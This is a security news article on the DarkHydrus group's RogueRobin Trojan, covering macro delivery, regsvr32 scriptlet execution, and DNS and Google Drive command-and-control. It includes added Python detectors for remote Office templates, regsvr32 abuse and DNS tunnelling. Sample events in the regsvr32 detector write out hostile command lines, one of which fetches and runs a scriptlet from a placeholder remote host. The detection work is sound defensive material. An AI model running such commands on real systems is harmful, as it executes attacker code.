DarkHydrus APT is found using Google Drive to communicate with RogueRobin Trojan horse

Malware linked to the DarkHydrus APT group has been found abusing Google Drive

RogueRobin linked to DarkHydrus APT uses Google Drive as C&C server

The well-known DarkHydrus APT group's RogueRobin Trojan uses the Google Drive API as a command-and-control channel.

Recently, security researchers spotted a new malware strain believed to be linked to the well-known DarkHydrus advanced persistent threat (APT) group. The group is known for attacks on government entities and educational institutions in the Middle East.

In August 2018, the group was found using a tool called Phishery to deliver weaponized Office documents that harvested credentials and other sensitive information from various targets.[1] The technique relies on a document template that is loaded from a remote server controlled by the attackers. That server demands authentication, so Microsoft Office prompts the user for credentials; once entered, they are sent to DarkHydrus.
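The remote-template trick above leaves a visible trace in the document itself: an attachedTemplate relationship whose target is an external URL. The following script, added here as an example and not part of the original article or of any DarkHydrus tooling, builds a minimal in-memory .docx (constructed sample, with a documentation-range URL) and then checks any .docx for such a relationship, which is the check a mail gateway or incident responder can run without opening the file in Word.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_docx(template_target=None):
    """Build a minimal .docx in memory (constructed sample, not a real document).

    If template_target is given, an external attachedTemplate relationship is
    added, which is what Phishery-style documents contain: Word fetches the
    template from that URL when the file is opened.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/'
                   'package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   f'<?xml version="1.0"?><w:document xmlns:w="{WML_NS}"><w:body/></w:document>')
        settings = f'<?xml version="1.0"?><w:settings xmlns:w="{WML_NS}" xmlns:r="{R_NS}">'
        rels = f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}">'
        if template_target:
            settings += '<w:attachedTemplate r:id="rId1"/>'
            rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                     f'Target="{template_target}" TargetMode="External"/>')
        settings += "</w:settings>"
        rels += "</Relationships>"
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def find_remote_templates(docx_bytes):
    """Return every external attachedTemplate target found in the document.

    A non-empty result means Word will contact that location on open; if the
    server answers 401 with WWW-Authenticate: Basic, the user gets a credential
    prompt and whatever they type is sent to the attacker.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # Relationships of a settings part live in <dir>/_rels/settings.xml.rels
            if not name.endswith("_rels/settings.xml.rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                # External mode, an http(s)/file URL or a UNC path all mean "fetch from elsewhere"
                if rel.get("TargetMode") == "External" or re.match(r"^(https?:|file:|\\\\)", target, re.I):
                    findings.append(target)
    return findings


if __name__ == "__main__":
    # 203.0.113.0/24 is reserved for documentation; the URL is a constructed placeholder
    sample = build_docx("https://203.0.113.10/template.dotx")
    print("clean document:", find_remote_templates(build_docx()))
    print("phishery-style document:", find_remote_templates(sample))
```

The same check applies to documents that were merely edited on a machine with a legitimate network template; a finding therefore means "inspect the target", not "malicious" on its own.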

Now the group has launched another attack against targets in the Middle East.[2] According to Palo Alto Networks, the attackers are delivering the RogueRobin Trojan, and this version can use the Google Drive API as an alternative command-and-control (C&C) channel, which lets its traffic blend in with legitimate use of the service and helps it evade detection by antivirus programs.

The infection relies on VBA macros

This time the attackers deliver a backdoor Trojan called RogueRobin through an Excel file that victims are lured into opening.[3] Once opened, the document asks the user to enable VBA macros. If they are enabled, the macro writes a text file to a specific location on disk and runs it through the legitimate Windows utility regsvr32.exe, which executes the file as a scriptlet and installs RogueRobin on the targeted system. The payload is written in C#, a change from the PowerShell-based version seen earlier, which makes analysis more involved.
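The chain described above (Office application, then regsvr32.exe handed a non-DLL file from a temporary directory together with scrobj.dll) is easy to spot in process-creation telemetry. The script below is an added example, not code from the article or from the malware: it runs a small set of indicators over constructed Sysmon-style process events (the file names, user name and URL are made up) and also catches the remote-URL form of the same regsvr32 scriptlet technique, which the article does not describe but which the same check covers.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record, in the shape Sysmon event ID 1 provides."""
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# regsvr32 /i:<target> passes <target> to the DLL's DllInstall; with scrobj.dll
# that target is executed as a scriptlet, whatever its file extension.
SCRIPTLET_ARG = re.compile(r'/i:\s*"?([^\s"]+)', re.IGNORECASE)


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def regsvr32_indicators(ev):
    """Return the reasons an event looks like regsvr32 being used to run a scriptlet."""
    if _basename(ev.image) != "regsvr32.exe":
        return []
    reasons = []
    cmd = ev.command_line.lower()
    if _basename(ev.parent_image) in OFFICE_APPS:
        reasons.append("spawned by an Office application")
    if "scrobj.dll" in cmd:
        reasons.append("loads scrobj.dll (scriptlet host)")
    m = SCRIPTLET_ARG.search(ev.command_line)
    if m:
        target = m.group(1).lower()
        if target.startswith(("http://", "https://")):
            reasons.append("/i: points at a URL")
        elif not target.endswith((".dll", ".ocx")):
            reasons.append("/i: points at a non-DLL file (." + target.rsplit(".", 1)[-1] + ")")
        if "\\temp\\" in target or "%temp%" in target:
            reasons.append("scriptlet in a temp directory")
    return reasons


def suspicious_events(events, min_reasons=2):
    """Indexes and reasons for events meeting the threshold; one reason alone is noise."""
    hits = []
    for i, ev in enumerate(events):
        reasons = regsvr32_indicators(ev)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry): a benign installer registering a
# DLL, the dropped-.txt chain from the article, the remote-scriptlet variant, and
# an unrelated Office child process.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:C:\Users\alice\AppData\Local\Temp\report.txt scrobj.dll"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
                 r"regsvr32.exe /s /i:https://203.0.113.10/x.sct scrobj.dll"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir"),
]

if __name__ == "__main__":
    for idx, why in suspicious_events(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line)
        for r in why:
            print("   -", r)
```

Requiring two indicators keeps ordinary DLL registration by installers out of the alert queue while still catching both the on-disk and the remote scriptlet forms.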

Researchers cannot say exactly when the malicious documents were used in attacks, but timestamps inside them suggest the group created the documents between December 2018 and January 2019:[4]

Without the delivery mechanism we cannot confirm the exact time these delivery documents were used in an attack; however, the observed timestamps within these three delivery documents give us an idea when the DarkHydrus actors created them. While the creation times were timestomped to a default time of 2006-09-16 00:00:00Z commonly observed in malicious documents, the Last Modified times were still available and suggest that DarkHydrus created these documents in December 2018 and January 2019.

RogueRobin includes numerous malicious features

Researchers found that the new version of RogueRobin has a range of capabilities:

  • before running its main logic, it checks the system's memory size and other characteristics to detect sandboxes and analysis environments;
  • it contains anti-debugging code;
  • it communicates with its C&C servers[5] through DNS queries, tunnelling commands and results in the query and response data;
  • it can use the Google Drive API as an alternative channel to receive commands from the attackers.
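DNS-based C&C of the kind listed above stands out in resolver logs: one domain receives a stream of never-repeating, long, random-looking subdomains, often across several record types. The script below is an added example, not part of the article or of any published RogueRobin analysis; it profiles a constructed DNS query log (the domains, client address and labels are made up, with labels derived from SHA-256 so the sample is deterministic) and flags a domain only when several indicators coincide.

```python
import hashlib
import math
from collections import defaultdict


def _constructed_log():
    """Constructed DNS query log, 'timestamp client qname qtype' per line (not real traffic).

    Five ordinary lookups of example.org, then 30 queries to c2-example.test that
    imitate a tunnelling beacon: a fresh 24-character label each time, rotating
    through record types.
    """
    lines = []
    for i, q in enumerate(["www", "mail", "update", "www", "www"]):
        lines.append(f"2019-01-17T09:00:{i:02d}Z 10.0.0.5 {q}.example.org {'A' if i % 2 else 'AAAA'}")
    qtypes = ["A", "AAAA", "TXT", "MX", "SRV", "SOA"]
    for i in range(30):
        label = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:24]
        lines.append(f"2019-01-17T09:01:{i:02d}Z 10.0.0.5 {label}.c2-example.test {qtypes[i % len(qtypes)]}")
    return lines


SAMPLE_LOG = _constructed_log()


def registered_domain(qname):
    # Assumption: the last two labels are the registrable domain. Production code
    # should use the public suffix list so that e.g. host.example.co.uk groups correctly.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(text):
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def profile_domains(log_lines):
    """Aggregate per registered domain: distinct subdomains, their labels, record types."""
    profiles = defaultdict(lambda: {"subdomains": set(), "qtypes": set(), "labels": []})
    for line in log_lines:
        _ts, _client, qname, qtype = line.split()
        dom = registered_domain(qname)
        q = qname.lower().rstrip(".")
        sub = q[: -len(dom) - 1] if q.endswith("." + dom) else ""
        p = profiles[dom]
        p["subdomains"].add(sub)
        p["qtypes"].add(qtype.upper())
        p["labels"].extend(l for l in sub.split(".") if l)
    return profiles


def tunnelling_indicators(profile, min_unique=20, min_label_len=16, min_entropy=3.5):
    """Indicators that a domain's query pattern looks like data carried in DNS."""
    indicators = []
    labels = profile["labels"]
    if len(profile["subdomains"]) >= min_unique:
        indicators.append("many distinct subdomains")
    if labels and sum(map(len, labels)) / len(labels) >= min_label_len:
        indicators.append("long labels")
    if shannon_entropy("".join(labels)) >= min_entropy:
        indicators.append("high-entropy labels")
    # Hosts normally resolve names with A/AAAA; beacons that rotate through TXT, MX,
    # SRV, SOA and similar types to carry data show up as type diversity.
    if len(profile["qtypes"] - {"A", "AAAA"}) >= 2:
        indicators.append("several non-address record types")
    return indicators


def suspicious_domains(log_lines, min_indicators=3):
    out = {}
    for dom, prof in profile_domains(log_lines).items():
        ind = tunnelling_indicators(prof)
        if len(ind) >= min_indicators:
            out[dom] = ind
    return out


if __name__ == "__main__":
    for dom, ind in suspicious_domains(SAMPLE_LOG).items():
        print(dom, ind)
```

The thresholds are starting points: content-delivery networks and some telemetry services also generate many distinct subdomains, so an allow-list of known domains and a per-client baseline belong in front of this logic before it feeds alerts.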

To reduce the risk of such an attack, users should enable VBA macros only with extreme care. Microsoft Office disables them by default, and enabling them requires a deliberate manual action. We also advise staying cautious with email messages from unknown senders.[6] Verify the sender and the content first, and do not open suspicious-looking hyperlinks or attachments, as they may carry a dangerous threat.

About the author
Gabriel E. Hall, passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
